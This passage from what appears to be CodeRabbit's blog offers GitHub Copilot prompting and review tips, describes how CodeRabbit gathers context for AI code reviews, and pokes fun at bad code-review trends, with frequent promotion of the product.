![](https://victorious-bubble-f69a016683.media.strapiapp.com/e46b25ec4fd9587c21a00333405fa2aa273648aeedc28eac53d0869210d93811_ab7692f844.png)

**For example**, CodeRabbit might flag that your function lacks error handling for a specific edge case or suggest a more appropriate HTTP status code. On GitHub or GitLab, CodeRabbit can automatically comment on PRs with its findings, saving human reviewers time by catching obvious problems first. It also provides line-by-line code reviews, highlighting possible bugs, code smells, style issues, or even missing unit tests.
![](https://victorious-bubble-f69a016683.media.strapiapp.com/d1e844f97a52b3aa8628169bd4dcea57a1d15b72a6c8380af79bb1a4cad57411_fa2e26814e.png)

### How best to use Copilot and CodeRabbit together

Think of Copilot and CodeRabbit as two halves of a complete AI-assisted development cycle. You use Copilot while writing code to speed up implementation. Then you use CodeRabbit to review that code and catch anything Copilot (or you) might have missed.

* Copilot might generate a solution that works but isn’t optimal, and CodeRabbit could point out a performance issue or a more idiomatic approach.
* Copilot might not know your project’s specific coding standards, but CodeRabbit can enforce them during review. Perhaps your team prefers format() over f-strings; CodeRabbit can comment on that.
* Copilot might help you quickly whip up a new API endpoint. CodeRabbit could then run and immediately warn, *“Hey, you didn’t handle the case where this input is null,”* or *“This SQL query might not be parameterized.”* You can address those before your human colleagues even look at the code.

Essentially, Copilot gets you to a working draft faster, and CodeRabbit gives you confidence to ship it by auditing the code. It’s like having an AI pair programmer and an AI code auditor working together. In the context of a [complete AI dev tool stack](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack), Copilot and CodeRabbit cover a lot: Copilot for coding, CodeRabbit for review, and you might even use other AI tools for testing or security.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/c25e6af29fb5100ced040f89b64954e2cfc677eaaf4280ce10f34bd287f2a4c7_1413ae1101.png)

To get started, [you can install CodeRabbit’s IDE extension](https://marketplace.visualstudio.com/items?itemName=CodeRabbit.coderabbit-vscode) or add it to your GitHub repository as a [GitHub App from the marketplace](https://coderabbit.link/j4daQIo).
We highly recommend this for teams and there’s even a [14-day trial.](https://coderabbit.link/ZboRIZI) ## **GitHub Copilot tip 6:** Be specific and provide examples in prompts When it comes to guiding an AI model, specificity is king. If you’re asking Copilot to write code to transform data, consider providing a short example of the data format in a comment or docstring. If you want a function to calculate something, state the formula or an example scenario in natural language. Copilot’s underlying model is essentially trying to predict what a knowledgeable developer would write next. If your prompt (context + comments) is vague, the model must guess and may go wrong. But if you spell out the details, including sample inputs and outputs where possible, the model has far less to guess. For instance, suppose you need to parse a log line like **"2025-06-02 09:00:00 - ERROR - failed to connect"**. Instead of just writing **\# parse log line**, you could write: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9325adc9c97184fae4dddb9f8e234c6a3f69e2e6c5e12671ea957423436a3839_1bb2f9b71a.png) This specific prompt gives Copilot a clear blueprint: it knows the log format and the desired output types. With the example shown, the chances of Copilot writing a correct **parse\_log\_entry** implementation (splitting by " - ", parsing the date with **datetime.strptime**, etc.) are much higher. Without the example, Copilot might misidentify the format or split incorrectly. When prompting Copilot for non-trivial code, spell out the details. If a function has constraints (e.g. “input can be null” or “assume list is sorted”), mention them. If there’s a particular approach you want (e.g. “use binary search” or “use recursion”), hint at it in your comment. And if possible, provide a quick example. The model will take these as strong cues and align its suggestions accordingly. 
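To make tip 6 concrete, here is a minimal sketch of what a specific prompt and a matching implementation could look like for the log line above. The docstring wording, the tuple return type, and the choice to split on only the first two separators are assumptions made for illustration; the original prompt appears only as a screenshot, and Copilot's actual output will vary.

```python
from datetime import datetime


def parse_log_entry(line: str) -> tuple[datetime, str, str]:
    """Parse a log line into (timestamp, level, message).

    Example input:  "2025-06-02 09:00:00 - ERROR - failed to connect"
    Example output: (datetime(2025, 6, 2, 9, 0, 0), "ERROR", "failed to connect")
    """
    # Split on the first two " - " separators only, so a message that
    # itself contains " - " is kept in one piece.
    timestamp_text, level, message = line.split(" - ", 2)
    # Parse the timestamp using the format shown in the docstring example.
    timestamp = datetime.strptime(timestamp_text, "%Y-%m-%d %H:%M:%S")
    return timestamp, level, message
```

The docstring does the work of the prompt here: it names the output types and shows one input/output pair, which is the kind of cue the tip recommends giving.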
## **GitHub Copilot tip 7:** Break complex tasks into smaller steps Copilot works best when it’s dealing with a focused, well-defined task. If you ask it to do too much at once, you might get a muddled or incomplete answer. A great strategy is to break down big problems into bite-sized pieces and tackle them one by one with Copilot’s help. **For example**, imagine you need to implement a complex algorithm. Instead of prompting Copilot to write the whole thing in one go (which might result in a long, confusing blob of code), start by outlining the high-level steps as comments or pseudocode. You might write a few lines of comments or stub functions and then let Copilot fill in each part. Generate code incrementally, rather than all at once. This approach makes Copilot’s job easier (each step has more specific context) and makes it easier for you to review and trust the code at each step. Let’s say you’re building a small command-line program. First, prompt Copilot to parse command-line arguments, then separately prompt it to implement the business logic, then prompt it to handle output. Breaking up the flow this way lets you check Copilot’s work at each stage. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4bcc6b81efaa9ce18002eae07042cae8e41677407fb2c4189b718c43bcb82f91_2ad789bd09.png) Think of Copilot as participating in a step-by-step refinement of your code. So, don’t try to have Copilot write an entire module in one shot. Instead, have it write one function at a time, or even one logical block at a time, especially if the logic is intricate. By decomposing tasks, you also naturally create opportunities to review each piece. This incremental approach leads to better quality code and fewer surprises. It’s much easier to debug a smaller Copilot suggestion than the 50-line monolith it spat out because you asked a very broad question. 
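As a rough illustration of the command-line example in tip 7, the sketch below splits a tiny program into the three steps described: argument parsing, business logic, and output. The word-counting task and every function name are hypothetical, chosen only to show the shape of the decomposition. Each function would be prompted for and reviewed on its own.

```python
import argparse


def parse_args(argv: list[str]) -> argparse.Namespace:
    """Step 1: parse command-line arguments."""
    parser = argparse.ArgumentParser(description="Count words in a piece of text.")
    parser.add_argument("text", help="text to analyze")
    parser.add_argument("--min-length", type=int, default=1,
                        help="ignore words shorter than this many characters")
    return parser.parse_args(argv)


def count_words(text: str, min_length: int) -> int:
    """Step 2: business logic, kept free of I/O so it is easy to test."""
    return sum(1 for word in text.split() if len(word) >= min_length)


def format_output(count: int) -> str:
    """Step 3: turn the result into a user-facing message."""
    return f"{count} word(s) matched"


def main(argv: list[str]) -> None:
    """Wire the three steps together."""
    args = parse_args(argv)
    print(format_output(count_words(args.text, args.min_length)))
```

Calling `main(["a bb ccc", "--min-length", "2"])` exercises all three steps at once, but because each step is a separate function you can also check `count_words` in isolation before trusting the whole flow.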
## **GitHub Copilot tip 8:** Leverage Copilot Chat vs inline completions wisely **GitHub Copilot has two primary flavors –** traditional inline code completion and the newer [Copilot Chat](https://docs.github.com/en/copilot/using-github-copilot/copilot-chat) (an interactive chat interface available in VS Code, Visual Studio, and other environments). Knowing when to use Copilot Chat vs when to rely on inline suggestions can make a big difference in your workflow. It’s one of those subtle hot tips for GitHub Copilot that can transform how you approach a problem. **Inline code completions** (the original Copilot experience) are best for: * **In-the-flow coding assistance:** When you’re writing code and want Copilot to suggest the next line or block as you type. This works great for completing a small algorithm, filling in a loop, or writing boilerplate in place. * **Filling in repetitive code or simple patterns:** For example, generating a quick data class, an API call, or the next cases in a series of if/elif conditions. The inline suggestions excel at continuing your current context. * **Generating code from a commented intent:** as we’ve seen, if you write a comment # do X, the inline completion often does X immediately in code form. On the other hand, Copilot Chat is more powerful when you need more interaction or have questions about your code: * **Explaining or analyzing code:** You can ask Copilot Chat *“What does this function do?”* or *“Why am I getting a KeyError here?”* and get a natural language answer. The chat can act like a super-smart rubber ducky for debugging. * **Larger code generation tasks with iteration:** If you want to generate a sizable chunk of code (say a whole function or class) and then refine it, Copilot Chat is ideal. You might ask it to write the code, then say, “now optimize this” or “can you refactor that part using a dictionary instead of if-else?” This back-and-forth is something inline suggestions can’t do easily. 
* **Using personas or specific commands:** Copilot Chat has a concept of *keywords and skills* (and allows system-level instructions like “Act as a senior developer…”) which you can use to influence its style or thoroughness. For instance, you could instruct it to be security-conscious when writing the code. To illustrate, if I have a piece of code and I’m not sure it’s efficient, I might use Copilot Chat: *“Explain the complexity of this function. How can I improve it?”* Copilot Chat might identify the bottleneck and even suggest a more efficient approach. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/55ab18ed5d8a2c3f4f6e0f3cc1c144c606d75beeb7d54ec8b16eb92fde1a1707_bd4d22969d.png) On the other hand, if I just need the next few lines of a loop, inline completion is faster. I can just hit Tab and keep coding. **Tip:** If you have access to both, don’t forget you can use them together. Maybe start writing a test function (inline completion helps you fill out test cases), then switch to Chat to ask Copilot to generate some additional tests or explain a failing test. Each tool has its sweet spot. ## **GitHub Copilot tip 9:** Cycle through suggestions and refine your prompts By default, Copilot might show you one suggestion – the most likely completion – for your prompt or code context. But what if that suggestion isn’t what you want? Many users forget that Copilot usually has **multiple suggestions** under the hood. Don’t settle for the first thing it offers if it’s not quite right. A GitHub Copilot tip that’s helped me is to use the keyboard shortcuts (or the Copilot panel) to cycle through alternative suggestions. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6adb2fdd7405325531f0bbf05c94671889fda236cbd7424fa2152ca6316016c0_0a99926881.png) There might be a gem in suggestion #2 or #3 that better fits your needs than suggestion #1. 
![](https://victorious-bubble-f69a016683.media.strapiapp.com/ed9da2cbf10ae6d75d67a93ef0c89001baa0f2ee83cbee5f7009f5b58ef78d88_91e4c976d3.png) Additionally, you can open the Copilot sidebar (or the full chat interface, if available) to explicitly ask for more options. In some IDE setups, hitting a special shortcut (like Ctrl+Enter in VS Code with Copilot Chat enabled) will even reveal multiple completions at once. Scanning through a few options can save you time you’d otherwise spend editing a less ideal suggestion. It’s like getting a second and third opinion from the AI. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/18222f10fff1de734f784123468789868f2be6fe91890dd1f2b95d92689535db_2c7604be88.png) If none of the suggestions look good, that’s a signal to refine your prompt or add more context. Perhaps your comment was too short or ambiguous. Try rephrasing it or adding another detail and then trigger Copilot again. The model’s output can vary greatly with slight changes in how you ask. For instance, if the **#sort list** didn’t give the desired result, then **#sort the list of names in alphabetical order** might produce a better suggestion. Another trick is giving feedback to Copilot. If you’re using Copilot Chat or the sidebar, you might have thumbs-up/down buttons you can press to give feedback on suggestions. While this won’t instantly change the current suggestion, it does send feedback to improve the model’s future behavior through reinforcement learning. And in chat mode, you can directly say, “No, that’s not what I meant. I actually want X,” and the AI will try again. ## **GitHub Copilot tip 10:** Review, test, and verify Copilot’s output Copilot can generate code that looks perfect at first glance, but remember, it’s not guaranteed to be 100% correct or optimal. Always review and test the suggestions before integrating them into your codebase. This tip cannot be stressed enough. 
Copilot may introduce bugs, security issues, or logically wrong code if the prompt is misunderstood. You, the developer, are the last line of defense to ensure quality. To review Copilot’s output, first, read the code carefully and make sure you understand it. If Copilot suggests a complex algorithm or some math you’re unsure about, ask Copilot (via Chat) or use your knowledge to break down what it’s doing. A helpful Copilot trick is to ask Copilot Chat to explain the suggested code in plain language. Often, I’ll paste a large suggestion into the chat and prompt: “Explain what this code does.” If the explanation reveals a wrong assumption or an error, you can catch it immediately. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/986ce869b9c8d3b49316a84b18aed345bd7235e8365daaaaf514c406759812da_1ba06d426e.png) Next, consider edge cases and correctness. * Does the code handle empty inputs? * What about error conditions? * If something looks fishy (like a potential off-by-one error or an unbounded recursion), address it or prompt Copilot to fix it. Security and style are also important. If your prompt didn't specify otherwise, Copilot might use a deprecated function or an insecure approach. Always double-check things like SQL queries (are they parameterized to prevent injection?), file operations (are files closed properly?), and any cryptography or authentication code it writes (does it follow best practices?). **Linting and static analysis tools are your friends here**. Run your linters or code formatters on Copilot’s code to catch style issues, and use any security scanners (like Snyk or CodeQL) if applicable to flag vulnerabilities. Finally, remember that Copilot might occasionally produce code that is oddly similar to public examples (especially for very common algorithms). It’s rare, but if you’re working on a closed-source project and have strict license requirements, be mindful of this. 
You can configure Copilot to avoid suggestions that match public code, if needed. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c39c534a2d3c6ce4958483656ce33377ef27534ab003a84fc5558bf1c0d00078_27b05691ff.png) ## Now, it’s time to use these hot tips for GitHub Copilot! GitHub Copilot is a game-changer for developers but like any powerful tool, it yields the best results when used skillfully. We’ve covered our top 10 hot tips for GitHub Copilot – from crafting great prompts and leveraging context to integrating Copilot with an AI reviewer like CodeRabbit. By implementing these GitHub Copilot best practices, you’ll find Copilot becomes much more helpful. It can handle the boilerplate and suggest clever solutions, allowing you to focus on higher-level thinking and problem-solving. Also, don’t forget that Copilot and the [surrounding AI ecosystem](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack) are evolving rapidly and new features (like the CLI tool, vision-based Copilot, etc.) are coming out regularly. Stay curious and keep experimenting with how you use it. Perhaps you’ll discover new GitHub Copilot tips and tricks beyond the ten we’ve shared. Or we’ll just write another article. ***Interested in using CodeRabbit with Copilot? Start your*** [***free 14-day trial.***](https://coderabbit.link/ZboRIZI)

Context Engineering: Level up your AI Code Reviews

Sahil Mohan Bansal — Thu, 17 Jul 2025 00:00:00 GMT

## Context is everything – especially in code reviews At CodeRabbit, we have engineered the most context-rich code reviews in the industry. While other code review tools might skim the surface and settle for just “codebase awareness,” we go deeper. We pull in dozens of data points from your codebase to deliver reviews that are accurate and actually helpful. We do this by packing a 1:1 ratio of code-to-context in our LLM prompts. For every line of code under review, we’re feeding the LLMs an equal weight of surrounding context. That includes key things like user intent, file dependencies, and expected outcome gathered from sources such as Jira tickets, code graph, past PRs, learnings from chat conversations, Linters, and more. And we don’t stop there. Every suggestion from our AI is verified post-generation to reduce hallucinations, ensure accuracy, and match it to your code reviews guidelines before it ever reaches your PR. This is context engineering – and it’s why CodeRabbit’s reviews lead the industry when it comes to relevance, quality, and trust. In this post, we’ll look at some of the most critical data points that go into CodeRabbit’s Context Engineering approach. [![CodeRabbit architecture](https://victorious-bubble-f69a016683.media.strapiapp.com/92e3f84c089db9dcfd647dbc39a11449a9ce3a945ed143635db1dcfad0451e18_ad1e34c9b7.png)](https://coderabbit.ai/) ## PR and Issue Indexing Every code review starts with CodeRabbit cloning your repo and keeping it in a sandbox. This ensures that all reviews are completely codebase aware and the code is kept secure in an isolated environment. CodeRabbit analyzes your codebase to understand the existing file relationships, code dependencies, project structure, and patterns across your codebase. To learn more about how CodeRabbit uses GCP Cloud Run Sandboxes, check out this [GCP blog](https://cloud.google.com/blog/products/ai-machine-learning/how-coderabbit-built-its-ai-code-review-agent-with-google-cloud-run). 
CodeRabbit also looks at your past PRs to gather additional context including PR titles, descriptions, and affected commit ranges so that it can get more information about the "why" behind code changes. Any previous related PRs are included in the review comments. By better understanding the “why” behind code changes being reviewed, CodeRabbit generates more context-aware AI code reviews. We also index your issues (Jira, Linear, GitHub and GitLab Issues) to understand the “intent” behind code changes. Any issue tickets attached to your PR are analyzed and an assessment of the code changes in the PR against the requirements in the linked issues is automatically generated. This helps us understand whether the asks in the issue ticket are adequately addressed by the PR. [![CodeRabbit assesses linked issues](https://victorious-bubble-f69a016683.media.strapiapp.com/399c6f5fd5fd005a6a507bdbd5be31cea3ccc9b552f7577dcac9a0ec055b51a1_5f79790c15.png)](https://docs.coderabbit.ai/reference/configuration#assess-linked-issues) ## Code Graph Analysis Every time a new review is triggered, CodeRabbit builds a graph representation of code dependencies. These are re-generated each time to make sure no new dependencies are missed. Understanding how various functions depend on each other across the codebase is critical to identifying any downstream conflicts that may cause breaking changes. CodeRabbit analyzes definitions of code symbols (e.g. types) from this code graph and uses those definitions to enhance context when providing review comments. This helps catch more edge cases and breaking dependencies that could otherwise be missed. You can see the code definitions that were used in the review comment. 
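To give a feel for what a graph of code dependencies can look like, here is a deliberately small sketch. It is not CodeRabbit's implementation: it only handles direct calls between top-level Python functions in a single source string, and the `SOURCE` snippet and function names are made up for illustration. It uses Python's standard `ast` module to find which functions call which, then walks the graph backwards to list everything that could be affected by changing one function.

```python
import ast

# Hypothetical code under review.
SOURCE = '''
def load(path):
    return open(path).read()

def parse(path):
    return load(path).splitlines()

def report(path):
    return len(parse(path))
'''


def build_call_graph(source: str) -> dict[str, set[str]]:
    """Map each top-level function to the top-level functions it calls directly."""
    tree = ast.parse(source)
    functions = {node.name: node for node in tree.body
                 if isinstance(node, ast.FunctionDef)}
    graph: dict[str, set[str]] = {name: set() for name in functions}
    for name, node in functions.items():
        for child in ast.walk(node):
            # Only plain-name calls such as load(...) are tracked here;
            # method calls like obj.read() are ignored in this sketch.
            if (isinstance(child, ast.Call)
                    and isinstance(child.func, ast.Name)
                    and child.func.id in functions):
                graph[name].add(child.func.id)
    return graph


def dependents_of(graph: dict[str, set[str]], target: str) -> set[str]:
    """Return every function that calls target, directly or transitively."""
    affected: set[str] = set()
    frontier = [target]
    while frontier:
        current = frontier.pop()
        for caller, callees in graph.items():
            if current in callees and caller not in affected:
                affected.add(caller)
                frontier.append(caller)
    return affected
```

With the sample source, `dependents_of(build_call_graph(SOURCE), "load")` returns both `parse` and `report`, which is the kind of downstream information a reviewer needs when `load` changes its behavior.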
[![CodeRabbit code graph analysis](https://victorious-bubble-f69a016683.media.strapiapp.com/6fe1be8c6be4feda5760acd5262ec3c3f9f1fd0cb58fbbae5c17af219871a2f8_433ebf4fdb.png)](https://docs.coderabbit.ai/integrations/code-graph-analysis/) ## Custom Review Instructions CodeRabbit includes custom review instructions specific to each team’s coding standards. Reviewing your code according to your own custom rules is a critical component of any intelligent code review and CodeRabbit provides a lot of flexibility in terms of how you can provide custom code review instructions: * [Path-based filters](https://docs.coderabbit.ai/guides/initial-configuration/?#filters): These are helpful to reduce the number of files and speed up the code review. Provide the file path in the form of a glob pattern and CodeRabbit will exclude those files from review, or provide an inverse glob pattern if you only want those files reviewed. * [Path-based instructions](https://docs.coderabbit.ai/guides/initial-configuration/?#review-path): These are custom review instructions that only apply to files that match the provided glob pattern. Both path filters and instructions are highly deterministic and will kick in when the pattern matches. These are useful to include when you want certain review rules to only apply to some functions. * [Coding agent guidelines](https://docs.coderabbit.ai/integrations/knowledge-base/?#code_guidelines): If you already have your coding guidelines set up in an AI coding agent (Cursor, Copilot, Cline, Windsurf, etc.) then CodeRabbit can import them and use those existing rules in its code reviews. Just provide the rules file path and we will import the code guidelines. * [Learnings from chat](https://docs.coderabbit.ai/integrations/knowledge-base/?#learnings): This is a simple and intuitive way to provide feedback on review comments. Don’t like something in the review? 
Just chat with CodeRabbit and tell it you don’t want those kinds of comments or you would like it to analyze similar issues through a specific lens and it will include your chat feedback in future code reviews. [![CodeRabbit learnings from chat](https://victorious-bubble-f69a016683.media.strapiapp.com/81f1d46f3d51b0dd802eb7bf60497529ff3134f3c9733aab00f6dd26702124ef_3e7f3bcc2b.png)](https://docs.coderabbit.ai/integrations/knowledge-base/?#learnings) ## Linters and Static Analyzers CodeRabbit packages 40+ Linters/SAST tools with zero-touch configuration needed from the user. While most customers may have some Linters pre-configured, we provide a much more comprehensive set of Linters. These tools are automatically invoked during the code review process and their results are validated by our verification agent to cut down on the noise that’s often typical of Linters. A more exhaustive list of Linters helps catch more bugs. We check your code by running it through all of the 40+ supported Linters that are relevant to the code in question. If you prefer to use your config file and the tool supports a custom config file, then you can provide the file path for your config file and we will use the rules from your config file in code reviews. When a bug is caught because of a Linter, you will see that called out in the review comment. You can check out the full list of [supported Linters](https://docs.coderabbit.ai/tools/list/) in our documentation. [![CodeRabbit Linters](https://victorious-bubble-f69a016683.media.strapiapp.com/48fd056e6089a50e51592bb702fb3a7afa0346a0552aacaaa3604eba55eb1686_36e7df53ea.png)](https://docs.coderabbit.ai/tools/list/) ## Web Query Sometimes the underlying LLM used in reviews may not be up to date enough to review the code accurately. For example, the LLM may not be aware of the latest security update or a new patch release for a particular programming language. 
In those cases, CodeRabbit will run a real-time web query to fetch technical information from publicly available release notes or technical documentation and include that in the code review. This helps ensure your code review includes the latest info and doesn’t accidentally flag errors due to outdated info. In the example below, the code was referencing Go version 1.23.6, and the LLM was not aware of a newer version, but CodeRabbit was able to run a Web Query and figure out that actually the latest Go version is 1.24.1 and recommended the user to refer to the latest Go release. [![CodeRabbit web query](https://victorious-bubble-f69a016683.media.strapiapp.com/2c1f9cc518af0cd95d037aca66fc7c8fec790108e84f6497292dab37c0f4d61a_6891b97224.png)](https://docs.coderabbit.ai/guides/agent_chat/?#web-search) ## Verification Scripts Lastly, CodeRabbit also runs verification scripts on the review comments provided by the LLMs to make sure that the review comments will meaningfully improve the codebase. These verification scripts are generated in the sandbox and any low value feedback is automatically filtered out and not passed on to the user, helping filter out most of the AI hallucinations that can sometimes occur. [![CodeRabbit verification script](https://victorious-bubble-f69a016683.media.strapiapp.com/5b718c02cb1247cf333c00d0651c6f66af23452038573d7a697ff884758552b3_63ba61125f.png)](https://docs.coderabbit.ai/guides/code-review-overview/) ## Industry leading context engineering for better code reviews As you can see, CodeRabbit has an extensive Context Engineering approach that ultimately provides more accurate code reviews by giving LLMs just the right amount of contextual information to catch more bugs without overwhelming them. 
We achieve this by: * Understanding the intent behind code changes to catch otherwise hard to find bugs * Feeding the right amount of information to LLMs with a 1:1 ratio of code to context * Filtering out low value review comments to maintain a high signal to noise ratio If you’d like to give CodeRabbit a try, we offer a [free 14-day trial](https://app.coderabbit.ai/login?free-trial) and it only takes a couple of minutes to give access to your repo. Let us know if you have any questions [on Discord](https://discord.gg/coderabbit)!

Good code review advice doesn't come from threads with 🚀 in them

Emily Lint — Wed, 16 Jul 2025 00:00:00 GMT

Code reviews used to be a quiet, dignified affair—an async ritual where you thoughtfully (or passive aggressively) gave feedback and occasionally dropped a “nit: maybe rename this var?” comment to feel alive. But then social media got involved. Now, developers are sharing hot takes about code reviews, many of which sound like they were written by someone who’s never met another human being. In one corner, we have Twitter influencers claiming you should “just merge it and fix it later” because iteration (and downtime) is life, apparently? In another, LinkedIn grindset bros are insisting that *real* devs don’t need code reviews because “you should trust your team.” And then there’s the advice that seems like trauma disguised as tradition: “Our team just roasts each other’s code live on Fridays. It builds character.” Or: “We only do in-person code reviews, it keeps people honest.” Translation: we’ve replaced the comments section with live humiliation. Bold strategy. To illustrate the impact of influencers on development cycles, we created a comic. *The Battle of the Bathrobe Influencers* playfully pokes fun at some of our favorite influencers and how many different code review takes there are on the timeline right now and how that might affect individual developers if teams actually listened to and followed all the competing takes. ***No influencers were harmed in the making of this comic… we hope.*** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0f82bcff4d9ed22ee2d3ffba7110e0f06faf5f4b443c4e040b329ab9d400e874_d8260dfd02.png) At CodeRabbit, we love a good code review etiquette debate but we also like shipping code *and* keeping our coworkers emotionally intact. So, we’ve put together a list of some code review bad takes we’ve seen floating around the timeline—and what to do instead if you don’t want your team quietly scheming your removal from the repo. 
## Bad code review trend #1: The “Just merge it” mentality ![](https://victorious-bubble-f69a016683.media.strapiapp.com/024b59e73bb379a4adb3d59ff6d642ef342c9f8c876ec4122a50d6597ae3272a_596583ad77.png) If you've ever seen a pull request titled “WIP – just gonna merge this for now,” you’ve met a “Just merge it” dev. They’re disciples of the “move fast and break literally everything” school of development. They believe that shipping code quickly, no matter how bad, is a strength and that fixing things later is part of the agile lifestyle. But here’s what actually happens when you merge bad code to “fix later”: you don’t fix it later. No one does. It goes to production. It breaks. Now your teammate is debugging a mystery bug on a Sunday night and slowly whispering your name like it’s part of a ritual curse. If you’re trying to speed things up, here’s a radical idea that’s better than just merging it: review your own code before you ask someone else to. Give it a read with fresh eyes. Clean up nonsense logic, remove dead code, and maybe run it through an [AI reviewer like CodeRabbit *in your IDE*](https://coderabbit.link/zZ3nEO6) so you don’t miss something humiliating (like importing a library you’re not even using. Again). ## Bad code review trend #2: “Code reviews are for juniors” ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2c375ccd9de1621e32eb40bed747d5bb0902c7e38a4b777d2347037112879654_ee6b5db713.png) Another fun trend: the belief that once you hit “Staff Engineer IV (Ascended Form),” code reviews are beneath you. You’ve achieved such enlightenment that no mortal can possibly understand your code. This mindset turns senior devs into unreviewable wizards who vanish into architectural side quests and return weeks later with 2,000-line PRs and the words “don’t worry, I tested it.” Here’s the truth: the more senior you are, the *more* important it is to have your code reviewed. 
Not because you don’t know what you’re doing but because your work is more impactful, more complex, and more likely to become the terrifying foundation for everything built after it. If that code is flawed, future developers will suffer. Plus, code reviews are a two-way street. Senior engineers can model how to give constructive feedback, share architectural context, and mentor others by writing thoughtful comments. They can also learn from junior devs who ask great questions or spot something weird because they’re not desensitized to your obscure variable naming scheme yet. So, don’t skip reviews. Normalize them at every level. ## Bad code review trend #3: “Nitpicks are toxic” ![](https://victorious-bubble-f69a016683.media.strapiapp.com/cc7e8ca0a492f51bf0aa5bb6445e778421020b0436668ebb69c9ab9da599fcdf_7d2a90fb66.png) There’s a growing movement online that says nitpicky comments in code reviews are basically microaggressions. That if you suggest someone rename a variable or break up a 30-line function, you’re stifling creativity and slowing down development for no good reason. Look, we get it. No one wants to receive 14 comments about whitespace and whether it’s “utils” or “helpers.” But not all nitpicks are created equal. The truth is, a lot of “tiny” things in code aren’t actually tiny. They’re death by a thousand readability cuts. Codebases rot from the inside out when no one sweeps up the small stuff. Confusing names, inconsistent structure, or one-off edge case handling eventually add up to a debugging experience best described as “psychological horror.” That said, nit-level feedback shouldn’t feel like an attack. The goal isn’t to flex your encyclopedic knowledge of the company style guide—it’s to help your teammate write code the next person (and the next-next person) can understand. You can do that without sounding like a passive-aggressive linter. Start by offloading the basics to, well… actual linters. 
CodeRabbit, for example, comes with [30+ linters built in](https://docs.coderabbit.ai/tools/list), so you don’t have to waste brain cells correcting indentation or lecturing someone about semicolons. That frees you up to focus on logic, clarity, and architecture—things humans are best at. ## Bad code review trend #4: Frequently turning code reviews into a performance (aka the live review trap) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a817c10335e0670190a8ceaeabd9cd1f1f0aea362403eb0334fe75b7c0e0a1b0_45d0c67756.png) You know what’s great about pull requests? You can review them in sweatpants at 10pm, covered in crumbs, muttering to yourself in peace if you want. You know what’s *not* great? Being called into a surprise Zoom meeting where your manager shares their screen and says, “Let’s walk through your code together... as a team.” Live code reviews are the latest workplace horror disguised as collaboration and “context sharing.” And sometimes they are! But often they’re just a weird hybrid of interrogation and performance art. You sit there while someone scrolls through your functions like they’re auctioning off your dignity and other devs chime in with helpful thoughts like, “Yeah, I had questions about that, too.” These sessions are especially rough for junior devs, introverts, or literally anyone who doesn’t enjoy public code autopsies. They discourage honest feedback (because who wants to be the one to say “this is confusing” in front of the CTO?) and eat up everyone’s calendars. What could’ve been solved with three async comments now requires a 45-minute meeting and an existential crisis. There *is* a place for live code reviews—but it’s not “every sprint, all the time.” Use them intentionally: for onboarding, gnarly architectural changes, or postmortems. And if you’re going to do one, give people a heads up. 
## Bad code review trend #5: Not reading through your AI-code first ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4b048e721c7211925a9963bc80598910090a3626444ce38d23aafc6ff135974d_d0684a3ec6.png) As if things weren’t chaotic enough in development, we now have AI entering the scene like a caffeinated intern who *means well* but keeps hallucinating entire modules. AI coding tools are powerful – but also deeply chaotic. They’ll give you working code *and* sprinkle in a few imaginary functions for flavor. We’ve seen it all: five-thousand-line PRs with variables named foo7, random timeouts, and logic that reads like someone asked ChatGPT to explain taxes using only metaphors. Sometimes it even compiles! But that doesn’t mean your AI sidekick didn’t also sneak in a few logic bugs, duplicate code blocks, or functions that only make sense if you’re a large language model yourself. AI tools are here to help – not replace critical thinking. If your workflow is “vibe prompt, commit code, start lunch,” then yes: you’re part of the problem. Review what your AI assistant wrote. Refactor. Sanity check. And for the love of merge conflicts, run a local AI review before unleashing it on your team. CodeRabbit’s [AI reviewer in your IDE](https://coderabbit.link/zZ3nEO6) can catch a lot of issues before your teammates have to. It’s like having a robot tell you your fly’s down before you walk into a meeting – deeply appreciated and MUCH less awkward than your boss doing it. ## Code review etiquette: How to be a code reviewer people want to work with Let’s say you’ve made it through this blog post without recognizing yourself in any of these horror stories. You win! Now, let’s level up: how do you become the kind of reviewer people *actually like* getting feedback from? * Start by being human. Leave thoughtful comments that explain the *why*, not just the what. * Ask questions when something’s unclear instead of assuming malice or incompetence. 
* If something’s genuinely clever or elegant? Say so! A simple “nice work” in a PR can be a game-changer—especially when the rest of the comments feel like homework corrections. * It also helps to not sound like a compiler error in human skin. Use a friendly tone. Emojis are fine in moderation (a well-placed 👀 or 🎉 goes a long way). * You can even sprinkle in a bit of humor, assuming your teammate isn’t currently crying over merge conflicts – or maybe because they are and you want to make them laugh. The golden rule of code review etiquette is simple: give the kind of feedback you’d want to receive. And maybe don’t reply to every comment with a Notion doc defending your variable naming philosophy. Life’s too short. *Want an AI reviewer that won’t give bad advice? Try* [*CodeRabbit in your IDE and git-platform.*](https://coderabbit.link/WvkI4n6)

The art and science of context engineering for AI code reviews

Amitosh Swain — Wed, 16 Jul 2025 00:00:00 GMT

The difference between a mediocre and exceptional AI agent comes down to one thing: *context*. Context engineering has recently become a buzzword. In late June, [Shopify CEO Tobi Lutke](https://x.com/tobi/status/1935533422589399127) tweeted about it and [Andrej Karpathy](https://x.com/karpathy/status/1937902205765607626) chimed in to point out that good context engineering is what sets AI apps apart. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c46b3383ae52494b4faf8a4d826df89eae2ddeb1f4d7dbac1a6451cb67c4ed2d_42dbf840ae.jpg) CodeRabbit is a great example of the difference context makes. Every day, we perform tens of thousands of code reviews — either on our users’ pull requests or in their IDEs. Each review comment that CodeRabbit makes is the result of a carefully engineered non-linear review pipeline that pulls in contextual data, related to code being reviewed, from dozens of sources and then runs verification agents to check again that every suggestion we share makes sense within the context of both the PR we’re reviewing and the greater codebase. Context engineering is the difference between an AI code review tool that merely pattern-matches against generic coding standards and one that deeply understands your project's specific architecture, patterns, and goals – and can actually add value to your code review. ## The nature of context engineering in code reviews 